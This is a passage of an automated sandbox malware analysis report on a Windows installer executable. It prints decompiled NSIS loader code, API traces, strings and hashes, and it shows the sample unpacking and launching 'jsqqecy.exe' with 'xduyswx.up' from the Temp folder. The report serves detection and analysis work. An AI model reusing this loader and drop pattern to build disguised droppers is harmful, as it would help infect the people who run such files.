                          0x004038d7
                          0x004038dd
                          0x004038eb
                          0x00403a0d
                          0x00403a0d
                          0x00000000
                          0x00403a0d
                          0x004038f1
                          0x004038fa
                          0x00403939
                          0x00000000
                          0x00403939
                          0x004037f3
                          0x004037f3
                          0x004037f8
                          0x00000000
                          0x00000000
                          0x004037fd
                          0x00403802
                          0x00403812
                          0x00403817
                          0x0040381e
                          0x00000000
                          0x00000000
                          0x00403822
                          0x00403824
                          0x00403831
                          0x00403831
                          0x00403839
                          0x0040383f
                          0x00403867
                          0x0040386f
                          0x00000000
                          0x00403851
                          0x00403852
                          0x0040385b
                          0x00403861
                          0x00403862
                          0x00000000
                          0x00403862
                          0x0040385d
                          0x0040385f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040385f
                          0x0040383f

                          APIs
                            • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                            • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                          • lstrcatA.KERNEL32(1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\2022-571-GLS.exe",00000000), ref: 004037BF
                          • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,?,?,?,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403834
                          • lstrcmpiA.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,?,?,?,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000), ref: 00403847
                          • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up), ref: 00403852
                          • LoadImageA.USER32 ref: 0040389B
                            • Part of subcall function 00405C59: wsprintfA.USER32 ref: 00405C66
                          • RegisterClassA.USER32 ref: 004038E2
                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004038FA
                          • CreateWindowExA.USER32 ref: 00403933
                          • ShowWindow.USER32(00000005,00000000), ref: 00403969
                          • GetClassInfoA.USER32 ref: 00403995
                          • GetClassInfoA.USER32 ref: 004039A2
                          • RegisterClassA.USER32 ref: 004039AB
                          • DialogBoxParamA.USER32 ref: 004039CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: 7B$"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up$"C:\Users\user\Desktop\2022-571-GLS.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                          • API String ID: 1975747703-1502957213
                          • Opcode ID: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                          • Instruction ID: 6194fd7cfee4ca64757fce53943c04d911d469c5366995da23240c14efb645f2
                          • Opcode Fuzzy Hash: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                          • Instruction Fuzzy Hash: 6161B6B17442407ED620BF65AD45F2B3ABCEB8474AF40453FF941B22E1D67CA9418A2D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402C88 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 208 402c88-402cd6 GetTickCount GetModuleFileNameA call 4059d2 211 402ce2-402d10 call 405cfb call 405835 call 405cfb GetFileSize 208->211 212 402cd8-402cdd 208->212 220 402e00-402e0e call 402be9 211->220 221 402d16-402d2d 211->221 213 402f27-402f2b 212->213 228 402e14-402e17 220->228 229 402edf-402ee4 220->229 223 402d31-402d37 call 4031d5 221->223 224 402d2f 221->224 227 402d3c-402d3e 223->227 224->223 230 402d44-402d4a 227->230 231 402e9b-402ea3 call 402be9 227->231 232 402e43-402e8f GlobalAlloc call 406164 call 405a01 CreateFileA 228->232 233 402e19-402e31 call 403207 call 4031d5 228->233 229->213 234 402dca-402dce 230->234 235 402d4c-402d64 call 405993 230->235 231->229 259 402e91-402e96 232->259 260 402ea5-402ed5 call 403207 call 402f2e 232->260 233->229 256 402e37-402e3d 233->256 243 402dd0-402dd6 call 402be9 234->243 244 402dd7-402ddd 234->244 235->244 253 402d66-402d6d 235->253 243->244 246 402df0-402dfa 244->246 247 402ddf-402ded call 4060f6 244->247 246->220 246->221 247->246 253->244 258 402d6f-402d76 253->258 256->229 256->232 258->244 261 402d78-402d7f 258->261 259->213 268 402eda-402edd 260->268 261->244 263 402d81-402d88 261->263 263->244 265 402d8a-402daa 263->265 265->229 267 402db0-402db4 265->267 269 402db6-402dba 267->269 270 402dbc-402dc4 267->270 268->229 271 402ee6-402ef7 268->271 269->220 269->270 270->244 274 402dc6-402dc8 270->274 272 402ef9 271->272 273 402eff-402f04 271->273 272->273 275 402f05-402f0b 273->275 274->244 275->275 276 402f0d-402f25 call 405993 275->276 276->213
                          C-Code - Quality: 96%
                          			E00402C88(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423f8c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\2022-571-GLS.exe", 0x400);
				_t105 = E004059D2("C:\\Users\\jones\\Desktop\\2022-571-GLS.exe", 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405CFB("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\2022-571-GLS.exe");
				E00405CFB(0x42c000, E00405835("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f130 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BE9(1);
					__eflags =  *0x423f94; // 0x8400
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00406164(0x40b098);
						E00405A01( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423f94; // 0x8400
							_t65 = E00403207(_t63 + 0x1c);
							 *0x41f134 = _t65;
							 *0x417128 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F2E(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423f90 = _t110;
								 *0x423f98 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423f9c =  *0x423f9c + 1;
									__eflags =  *0x423f9c;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x417124; // 0x55c78
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405993(0x423fa0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403207( *0x417120);
					_t77 = E004031D5( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423f94; // 0x8400
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031D5(0x417130, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BE9(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f94; // 0x8400
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BE9(0);
							}
							goto L19;
						}
						E00405993( &_v40, 0x417130, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417120; // 0x105e9
						 *0x424020 =  *0x424020 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423f94 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f130;
						if(_t109 <  *0x41f130) {
							_v8 = E004060F6(_v8, 0x417130, _t106);
						}
						 *0x417120 =  *0x417120 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

































                          0x00402c96
                          0x00402c99
                          0x00402cb3
                          0x00402cb8
                          0x00402ccb
                          0x00402cd0
                          0x00402cd6
                          0x00000000
                          0x00402cd8
                          0x00402ce9
                          0x00402cfa
                          0x00402d01
                          0x00402d07
                          0x00402d09
                          0x00402d0e
                          0x00402d10
                          0x00402e00
                          0x00402e02
                          0x00402e07
                          0x00402e0e
                          0x00000000
                          0x00000000
                          0x00402e14
                          0x00402e17
                          0x00402e43
                          0x00402e48
                          0x00402e53
                          0x00402e55
                          0x00402e66
                          0x00402e81
                          0x00402e87
                          0x00402e8a
                          0x00402e8f
                          0x00402ea5
                          0x00402eae
                          0x00402ebe
                          0x00402ed0
                          0x00402ed5
                          0x00402eda
                          0x00402edd
                          0x00402ee6
                          0x00402eea
                          0x00402ef2
                          0x00402ef7
                          0x00402ef9
                          0x00402ef9
                          0x00402ef9
                          0x00402f01
                          0x00402f01
                          0x00402f04
                          0x00402f05
                          0x00402f05
                          0x00402f08
                          0x00402f0a
                          0x00402f0a
                          0x00402f0a
                          0x00402f0d
                          0x00402f14
                          0x00402f20
                          0x00402f25
                          0x00000000
                          0x00402f25
                          0x00000000
                          0x00402edd
                          0x00000000
                          0x00402e91
                          0x00402e1f
                          0x00402e2a
                          0x00402e2f
                          0x00402e31
                          0x00000000
                          0x00000000
                          0x00402e3a
                          0x00402e3d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402d16
                          0x00402d16
                          0x00402d16
                          0x00402d1b
                          0x00402d1f
                          0x00402d26
                          0x00402d2b
                          0x00402d2d
                          0x00402d2f
                          0x00402d2f
                          0x00402d37
                          0x00402d3c
                          0x00402d3e
                          0x00402e9d
                          0x00402edf
                          0x00000000
                          0x00402edf
                          0x00402d44
                          0x00402d4a
                          0x00402dca
                          0x00402dce
                          0x00402dd1
                          0x00402dd6
                          0x00000000
                          0x00402dce
                          0x00402d57
                          0x00402d5c
                          0x00402d5f
                          0x00402d64
                          0x00000000
                          0x00000000
                          0x00402d66
                          0x00402d6d
                          0x00000000
                          0x00000000
                          0x00402d6f
                          0x00402d76
                          0x00000000
                          0x00000000
                          0x00402d78
                          0x00402d7f
                          0x00000000
                          0x00000000
                          0x00402d81
                          0x00402d88
                          0x00000000
                          0x00000000
                          0x00402d8a
                          0x00402d90
                          0x00402d99
                          0x00402d9f
                          0x00402da2
                          0x00402da4
                          0x00402daa
                          0x00000000
                          0x00000000
                          0x00402db0
                          0x00402db4
                          0x00402dbc
                          0x00402dbc
                          0x00402dbf
                          0x00402dc2
                          0x00402dc4
                          0x00402dc6
                          0x00402dc6
                          0x00000000
                          0x00402dc4
                          0x00402db6
                          0x00402dba
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402dd7
                          0x00402dd7
                          0x00402ddd
                          0x00402ded
                          0x00402ded
                          0x00402df0
                          0x00402df6
                          0x00402df8
                          0x00402df8
                          0x00000000
                          0x00402d16

                          APIs
                          • GetTickCount.KERNEL32 ref: 00402C9C
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\2022-571-GLS.exe,00000400), ref: 00402CB8
                            • Part of subcall function 004059D2: GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\2022-571-GLS.exe,80000000,00000003), ref: 004059D6
                            • Part of subcall function 004059D2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                          • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\2022-571-GLS.exe,C:\Users\user\Desktop\2022-571-GLS.exe,80000000,00000003), ref: 00402D01
                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E48
                          Strings
                          • soft, xrefs: 00402D78
                          • Error launching installer, xrefs: 00402CD8
                          • Null, xrefs: 00402D81
                          • C:\Users\user\Desktop\2022-571-GLS.exe, xrefs: 00402CA2, 00402CB1, 00402CC5, 00402CE2
                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E91
                          • Inst, xrefs: 00402D6F
                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDF
                          • "C:\Users\user\Desktop\2022-571-GLS.exe", xrefs: 00402C88
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C95, 00402E60
                          • C:\Users\user\Desktop, xrefs: 00402CE3, 00402CE8, 00402CEE
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\2022-571-GLS.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\2022-571-GLS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                          • API String ID: 2803837635-3984794015
                          • Opcode ID: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                          • Instruction ID: 0e9652230e662f00d3bd1f21a88cc9cb10148a41a7cca4fb595923dc4d2ca5a0
                          • Opcode Fuzzy Hash: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                          • Instruction Fuzzy Hash: 2461C231A40205ABDB20DF64DE89B9E77B9EB04319F20417BF604B62D1D7BC9D818B9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 75%
                          			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A0C(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040585B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004057EE(E00405CFB(0x409c50, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c50);
					E00405CFB();
				}
				E00405F5D(0x409c50);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405FF6(0x409c50);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004059B3(0x409c50);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004059D2(0x409c50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404FE7(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x424008;
						goto L32;
					} else {
						E00405CFB(0x40a450, 0x425000);
						E00405CFB(0x425000, 0x409c50);
						E00405D1D(_t75, 0x40a450, 0x409c50, 0x40a050,  *((intOrPtr*)(_t85 - 0x14)));
						E00405CFB(0x425000, 0x40a450);
						_t62 = E004055BC(0x40a050,  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x424008 =  &( *0x424008->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c50);
								_push(0xfffffffa);
								E00404FE7();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404FE7(0xffffffea,  *(_t85 - 0xc));
				 *0x424034 =  *0x424034 + 1;
				_t43 = E00402F2E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x424034 =  *0x424034 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffee);
					} else {
						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffe9);
						lstrcatA(0x409c50,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c50);
					E004055BC();
					goto L29;
				}
				goto L33;
			}
















                          0x00401734
                          0x0040173b
                          0x00401744
                          0x00401747
                          0x0040174a
                          0x0040174f
                          0x00401757
                          0x00401773
                          0x00401759
                          0x00401759
                          0x0040175a
                          0x0040175a
                          0x00401779
                          0x00401783
                          0x00401783
                          0x00401787
                          0x0040178a
                          0x0040178f
                          0x00401791
                          0x00401793
                          0x00401798
                          0x00401798
                          0x004017a3
                          0x004017a3
                          0x004017b4
                          0x004017b6
                          0x004017b6
                          0x004017b7
                          0x004017b7
                          0x004017ba
                          0x004017bd
                          0x004017c0
                          0x004017c0
                          0x004017c7
                          0x004017d6
                          0x004017db
                          0x004017de
                          0x004017e1
                          0x00000000
                          0x00000000
                          0x004017e3
                          0x004017e6
                          0x00401840
                          0x00401845
                          0x004015a8
                          0x00402672
                          0x00402672
                          0x004028a1
                          0x004028a4
                          0x004028a4
                          0x00000000
                          0x004017e8
                          0x004017ee
                          0x004017f9
                          0x00401806
                          0x00401811
                          0x00401827
                          0x00401827
                          0x0040182a
                          0x00000000
                          0x00401830
                          0x00401830
                          0x00401831
                          0x0040184e
                          0x004028aa
                          0x004028aa
                          0x004028aa
                          0x00401833
                          0x00401833
                          0x00401834
                          0x00401492
                          0x00402224
                          0x00402224
                          0x00402224
                          0x00401831
                          0x0040182a
                          0x004028ac
                          0x004028b0
                          0x004028b0
                          0x0040185e
                          0x00401863
                          0x00401871
                          0x00401876
                          0x0040187c
                          0x00401880
                          0x00401882
                          0x0040188a
                          0x00401896
                          0x00401884
                          0x00401884
                          0x00401888
                          0x00000000
                          0x00000000
                          0x00401888
                          0x0040189f
                          0x004018a5
                          0x004018a7
                          0x00000000
                          0x004018ad
                          0x004018ad
                          0x004018b0
                          0x004018c8
                          0x004018b2
                          0x004018b5
                          0x004018be
                          0x004018be
                          0x004018cd
                          0x004018d2
                          0x0040221f
                          0x00000000
                          0x0040221f
                          0x00000000

                          APIs
                          • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                          • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,00000000,00000000,"C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                            • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,djvgroedvnqvwkorzqvn Setup,NSIS Error), ref: 00405D08
                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                            • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                            • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: "C:\Users\user\AppData\Local\Temp\jsqqecy.exe" C:\Users\user\AppData\Local\Temp\xduyswx.up$C:\Users\user\AppData\Local\Temp
                          • API String ID: 1941528284-1131158672
                          • Opcode ID: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                          • Instruction ID: 259d77b7a90db29c7fa011e8bbfdec82aa2f97c3204575e8132969168071ea88
                          • Opcode Fuzzy Hash: a0738bd6af5fe49f804141574639d4b3e913ec42b508a49906380faa70039aab
                          • Instruction Fuzzy Hash: E041C332904519BADF107BA5CD45EAF3669EF41328B20823BF522F11E1D73C4A419F6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402F2E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 415 402f2e-402f3d 416 402f5b-402f66 call 403059 415->416 417 402f3f-402f55 SetFilePointer 415->417 420 403052-403056 416->420 421 402f6c-402f86 ReadFile 416->421 417->416 422 402f8c-402f8f 421->422 423 40304f 421->423 422->423 424 402f95-402fa8 call 403059 422->424 425 403051 423->425 424->420 428 402fae-402fb1 424->428 425->420 429 402fb3-402fb6 428->429 430 40301e-403024 428->430 433 40304a-40304d 429->433 434 402fbc 429->434 431 403026 430->431 432 403029-40303c ReadFile 430->432 431->432 432->423 435 40303e-403047 432->435 433->420 436 402fc1-402fc9 434->436 435->433 437 402fcb 436->437 438 402fce-402fe0 ReadFile 436->438 437->438 438->423 439 402fe2-402fe5 438->439 439->423 440 402fe7-402ffc WriteFile 439->440 441 40301a-40301c 440->441 442 402ffe-403001 440->442 441->425 442->441 443 403003-403016 442->443 443->436 444 403018 443->444 444->433
                          C-Code - Quality: 93%
                          			E00402F2E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
